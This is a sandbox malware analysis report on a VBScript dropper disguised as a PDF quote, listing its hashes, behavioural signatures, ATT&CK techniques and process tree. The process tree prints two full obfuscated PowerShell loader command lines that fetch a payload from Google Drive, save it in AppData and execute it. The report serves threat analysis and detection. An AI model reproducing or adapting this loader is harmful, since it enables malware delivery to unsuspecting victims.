56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0

General

Target

Request for Proposal Quote_2414976·pdf.vbs
Size

363KB
MD5

4c0d5b830080aa8b72546a6d7f924aca
SHA1

d061aa6f577e894eb58fd4bc64b366e2e7919630
SHA256

56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
SHA512

c87b174d0e027f6f85be7669e16b1430531f7880d507ebd1cec55f159fb71bf3ede586001c8a32424886e74dc3477b09d1108c133f75441575cf2d6c896d7d7d
SSDEEP

6144:1qJLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPE:4uInOi5cI5E0k

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 1616 WScript.exe
13 1396 powershell.exe
16 1396 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

12 drive.google.com
13 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1332 820 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1396 powershell.exe
1396 powershell.exe
820 powershell.exe
820 powershell.exe
820 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1396 powershell.exe
Token: SeDebugPrivilege 820 powershell.exe

flow	pid	process
4	1616	WScript.exe
13	1396	powershell.exe
16	1396	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
12	drive.google.com
13	drive.google.com

pid	pid_target	process	target process
1332	820	WerFault.exe	powershell.exe

pid	process
1396	powershell.exe
1396	powershell.exe
820	powershell.exe
820	powershell.exe
820	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	820	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1616 wrote to memory of 1396	1616	WScript.exe	powershell.exe
PID 1616 wrote to memory of 1396	1616	WScript.exe	powershell.exe
PID 1396 wrote to memory of 1288	1396	powershell.exe	cmd.exe
PID 1396 wrote to memory of 1288	1396	powershell.exe	cmd.exe
PID 1396 wrote to memory of 820	1396	powershell.exe	powershell.exe
PID 1396 wrote to memory of 820	1396	powershell.exe	powershell.exe
PID 1396 wrote to memory of 820	1396	powershell.exe	powershell.exe
PID 820 wrote to memory of 756	820	powershell.exe	cmd.exe
PID 820 wrote to memory of 756	820	powershell.exe	cmd.exe
PID 820 wrote to memory of 756	820	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
3⤵
PID:1288

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
4⤵
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 2360
4⤵
- Program crash
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 820 -ip 820
1⤵
PID:1232

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
Filesize
6KB

MD5
0daa8b536653bad441d95c2a2d0599e3

SHA1
21c8c8279bb40581e0667de6d15010f0bef0c206

SHA256
effc4e7de9249dba82434429fcc89b730f9d0d5e8064915673f2cccca995b098

SHA512
148daf06032180161585c7230393cbf62f20d3278da66ae8b19c67da7f39e2fe229ce94fb4ec8ada17353236aeeae6cd0e679bac0089034973be04d910fea509

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
Filesize
5KB

MD5
afc5e05f116fe2c4fcd104c0218ed209

SHA1
83d46b9bccfc9d3da86fff3b552600bdaff9aad0

SHA256
6e0fdd835f071ea9e34ba392b93e3fef994a53486aa5eab039127b3ae49024b3

SHA512
0e6200dc7d7eecc4e1bf3d7afd1ee4e03ff0334310147b82eb9fda145b6b81c3e4eb87c0bcf5d3a746816b0a929dc000fbab6daa7aea98341d56d2e589072d41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
Filesize
3KB

MD5
fe699e7801de060d278808932c5fc6d2

SHA1
cefc085de999f6333d1d9c4659f8b6c39e5c2631

SHA256
6748e39a430292a4e2131e78930855a5352d4f28db60f5ce38c850e81ff5fd92

SHA512
d4b2ed06b608eb2389a8b34d8cb7a6c17aa32725f2834b8dd01d74c75c492cc5e72f133c7ffe7d6ec981fd830ea8faf4c00f3067b45e4b6fe8788fcaad6a176b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cokylfm.4us.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\gennemsgnings.Fas
Filesize
463KB

MD5
eef3f42f8568ec1d96e3fc1a3174c27f

SHA1
b58f1fae7aeb4f69389a46d62fb110c5bf0b39a2

SHA256
f87d719b62b1b6a582ae647b47dcb70855495c65307cc786ebaf1580a7f1628e

SHA512
f386755db46e2454711107f92c6ebc47dbfb50d047ddc296304703223928f5a1e8a6156e05e1544e2fd9b07cf63a5fdf54a16ce3010f650670c828f8ee4d37dc

Download Submit
memory/820-345-0x00000000065D0000-0x000000000661C000-memory.dmp

Filesize
304KB

Download
memory/820-343-0x0000000005F90000-0x00000000062E4000-memory.dmp

Filesize
3.3MB

Download
memory/820-352-0x00000000745A0000-0x0000000074D50000-memory.dmp

Filesize
7.7MB

Download
memory/820-350-0x0000000008A20000-0x0000000008FC4000-memory.dmp

Filesize
5.6MB

Download
memory/820-349-0x00000000077D0000-0x00000000077F2000-memory.dmp

Filesize
136KB

Download
memory/820-328-0x0000000002C60000-0x0000000002C96000-memory.dmp

Filesize
216KB

Download
memory/820-329-0x00000000745A0000-0x0000000074D50000-memory.dmp

Filesize
7.7MB

Download
memory/820-330-0x00000000058B0000-0x0000000005ED8000-memory.dmp

Filesize
6.2MB

Download
memory/820-331-0x00000000056C0000-0x00000000056E2000-memory.dmp

Filesize
136KB

Download
memory/820-332-0x0000000005760000-0x00000000057C6000-memory.dmp

Filesize
408KB

Download
memory/820-333-0x00000000057D0000-0x0000000005836000-memory.dmp

Filesize
408KB

Download
memory/820-348-0x0000000007840000-0x00000000078D6000-memory.dmp

Filesize
600KB

Download
memory/820-344-0x0000000006590000-0x00000000065AE000-memory.dmp

Filesize
120KB

Download
